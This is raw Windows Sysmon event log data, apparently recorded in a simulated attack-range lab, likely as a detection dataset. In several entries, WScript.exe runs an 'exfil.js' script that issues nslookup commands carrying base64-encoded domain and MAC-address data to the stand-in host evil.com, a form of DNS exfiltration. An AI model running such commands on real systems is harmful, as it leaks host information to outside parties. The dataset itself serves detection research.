14:16:29.092{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.092{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-3140-000000005F02}4740C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.092{2E1864BB-17BD-629A-2F40-000000005F02}37764904C:\Windows\system32\cmd.exe{2E1864BB-17BD-629A-3140-000000005F02}4740C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.092{2E1864BB-17BD-629A-3140-000000005F02}4740C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BD-629A-2F40-000000005F02}3776C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqma.tmp 2>&1 10341000x8000000000000000199793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.060{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BD-629A-3040-000000005F02}5816C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.060{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BD-629A-3040-000000005F02}5816C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.045{2E1864BB-17BD-629A-3040-000000005F02}58165000C:\Windows\system32\conhost.exe{2E1864BB-17BD-629A-2F40-000000005F02}3776C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.029{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-3040-000000005F02}5816C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.029{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.029{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.528{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52657- 354300x8000000000000000199786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.463{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52656- 10341000x8000000000000000199785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.029{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.029{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.463{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52655- 354300x8000000000000000199782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.462{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52654- 10341000x8000000000000000199781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.029{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-2F40-000000005F02}3776C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000199780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.462{00000000-0000-0000-0000-000000000000}7848<unknown process>-udptruefalse127.0.0.1-52654-false127.0.0.1-53domain 10341000x8000000000000000199779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.029{2E1864BB-17A1-629A-783D-000000005F02}55526604C:\Windows\System32\WScript.exe{2E1864BB-17BD-629A-2F40-000000005F02}3776C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.029{2E1864BB-17BD-629A-2F40-000000005F02}3776C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqma.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000199777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.390{00000000-0000-0000-0000-000000000000}5912<unknown process>-udpfalsefalse127.0.0.1-52653-false127.0.0.1-53domain 354300x8000000000000000199776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.390{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52653- 354300x8000000000000000199775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.389{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52652- 354300x8000000000000000199774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.389{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52651- 23542300x8000000000000000199773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.013{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwbrz.tmpMD5=F2DEA30CCAFC980D2EE697947950EBBC,SHA256=F1E23F5C438D3FDCE7F81A746C6D3B73A4C9E6300EF433F28E2B4040CD435CFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.992{2E1864BB-17BC-629A-2D40-000000005F02}72563568C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-2E40-000000005F02}4004C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043934Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:29.401{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9CF331F8EE0A15EF19EE6D871270E0E,SHA256=3D66F408F7647DB0F623394C1C8711CE3DE107863372CE86B56DA252833522EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000200206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.996{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcxtux.tmpMD5=B16E2386D2E39F09BDE969D627970342,SHA256=797A98F63D6E57D0F6A3377DF2DF1B9F1EDDED7E98D9A5F6DC7382913541E075,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.964{2E1864BB-17BE-629A-5D40-000000005F02}70843864C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-5E40-000000005F02}7460C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.949{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.949{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.949{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.949{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.949{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-5E40-000000005F02}7460C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.949{2E1864BB-17BE-629A-5C40-000000005F02}46608096C:\Windows\system32\cmd.exe{2E1864BB-17BE-629A-5E40-000000005F02}7460C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.961{2E1864BB-17BE-629A-5E40-000000005F02}7460C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BE-629A-5C40-000000005F02}4660C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcxtux.tmp 2>&1 10341000x8000000000000000200197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.934{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-5D40-000000005F02}7084C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.934{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-5D40-000000005F02}7084C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.917{2E1864BB-17BE-629A-5D40-000000005F02}70843864C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-5C40-000000005F02}4660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.915{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-5D40-000000005F02}7084C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 